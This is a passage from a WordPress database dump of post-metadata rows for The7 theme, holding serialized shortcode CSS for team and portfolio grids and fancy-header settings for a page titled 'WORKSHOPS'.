0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(9577,2574,'_wp_page_template','default'),
(9578,2574,'_dt_microsite_primary_menu',''),
(9579,2574,'_dt_microsite_split_left_menu',''),
(9580,2574,'_dt_microsite_split_right_menu',''),
(9581,2574,'_dt_microsite_mobile_menu',''),
(9582,2572,'the7_shortcodes_dynamic_css','a:2:{s:32:\"14de6593636810be58e10d1ec7a9dbc6\";s:6837:\".dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media a,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media > span,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media img {\n  max-width: 120px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .dt-css-grid .team-media img {\n  width: 120px;\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-14de6593636810be58e10d1ec7a9dbc6.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(9586,2372,'_dt_fancy_header_layout_heading',''),
(9587,2372,'_dt_fancy_header_title_aligment','center'),
(9588,2372,'_dt_fancy_header_height','300'),
(9589,2372,'_dt_fancy_header_padding-top','0px'),
(9590,2372,'_dt_fancy_header_padding-bottom','0px'),
(9591,2372,'_dt_fancy_header_breadcrumbs_heading',''),
(9592,2372,'_dt_fancy_header_breadcrumbs','disabled'),
(9593,2372,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9594,2372,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9595,2372,'_dt_fancy_header_title_heading',''),
(9596,2372,'_dt_fancy_header_title_mode','custom'),
(9597,2372,'_dt_fancy_header_title','WORKSHOPS'),
(9598,2372,'_dt_fancy_header_title_font_size','50'),
(9599,2372,'_dt_fancy_header_title_line_height','36'),
(9600,2372,'_dt_fancy_header_text_transform','none'),
(9601,2372,'_dt_fancy_header_title_color_mode','color'),
(9602,2372,'_dt_fancy_header_title_color','#ffffff'),
(9603,2372,'_dt_fancy_header_subtitle_heading',''),
(9604,2372,'_dt_fancy_header_subtitle',''),
(9605,2372,'_dt_fancy_header_subtitle_font_size','18'),
(9606,2372,'_dt_fancy_header_subtitle_line_height','26'),
(9607,2372,'_dt_fancy_header_subtitle_text_transform','none'),
(9608,2372,'_dt_fancy_header_subtitle_color_mode','color'),
(9609,2372,'_dt_fancy_header_subtitle_color','#ffffff'),
(9610,2372,'_dt_fancy_header_bg_heading',''),
(9611,2372,'_dt_fancy_header_bg_color','#222222'),
(9612,2372,'_dt_fancy_header_bg_image_origin','featured_image'),
(9613,2372,'_dt_fancy_header_bg_image','a:0:{}'),
(9614,2372,'_dt_fancy_header_bg_repeat','no-repeat'),
(9615,2372,'_dt_fancy_header_bg_position_x','center'),
(9616,2372,'_dt_fancy_header_bg_position_y','center'),
(9617,2372,'_dt_fancy_header_bg_fullscreen','1'),
(9618,2372,'_dt_fancy_header_bg_overlay','0'),
(9619,2372,'_dt_fancy_header_overlay_color','#000'),
(9620,2372,'_dt_fancy_header_bg_overlay_opacity','50'),
(9621,2372,'_dt_fancy_header_scroll_effect','default'),
(9622,2372,'_dt_fancy_header_bg_parallax','0.5'),
(9623,2372,'_dt_fancy_header_responsiveness_heading',''),
(9624,2372,'_dt_fancy_header_responsiveness','enabled'),
(9625,2372,'_dt_fancy_header_responsiveness_switch','778px'),
(9626,2372,'_dt_fancy_header_responsive_height','70'),
(9627,2372,'_dt_fancy_header_responsive_font_size','30'),
(9628,2372,'_dt_fancy_header_responsive_title_line_height','38'),
(9629,2372,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9630,2372,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9631,2372,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
